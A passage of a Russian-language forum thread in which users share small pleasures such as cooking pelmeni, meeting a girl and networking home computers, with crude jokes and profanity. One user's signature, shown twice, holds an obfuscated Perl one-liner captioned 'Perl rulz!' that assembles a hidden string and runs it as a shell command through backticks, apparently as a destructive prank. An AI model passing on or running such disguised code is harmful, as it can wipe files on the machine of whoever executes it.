Эта тема противоположна теме ЖОПА!!! С кем какая радость приключилась!? _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!
Если радости не будет прошу в пост "ЖОПА"))) _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!
Вот какая радость:
Пойду щас на кухню и заебусь на 2-3 часа приготовлением пельменей. Пельмени - это хорошо
Правда, тесто месить не люблю, но это фигня. _________________ But all I want is you
Круто седня прошла вычеринка выпускников муз школы, с одной чувихой познакомился! _________________ - Не подскажите сколько времени?
Я не пил ваще! Там одна минералка была! И то без пузырьков! _________________ - Не подскажите сколько времени?
Да суть не в этом - ето графическая сказка "О быстро бегающем кролике" или "Сунул-вынул и пошёл"
Шутливая, конечно _________________ But all I want is you
Так до "сунул-вынул" еще не дошло! _________________ - Не подскажите сколько времени?
Да ладно те...нормальная деваха! _________________ - Не подскажите сколько времени?
Да ладно я не тупой шутку понял!
Просто я давно чувих с которыми интересно не встречал! _________________ - Не подскажите сколько времени?
я позавчера-таки с горем пополам набрался терпения и соеденил в сеть свои глючные компы, потом радовался,.... пока настрой не испортили _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
если не считать кучу металлолома раскиданую по всей квартире и в подвале, часть которой я даже не осматривал на предмет рабочести, то 2)) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!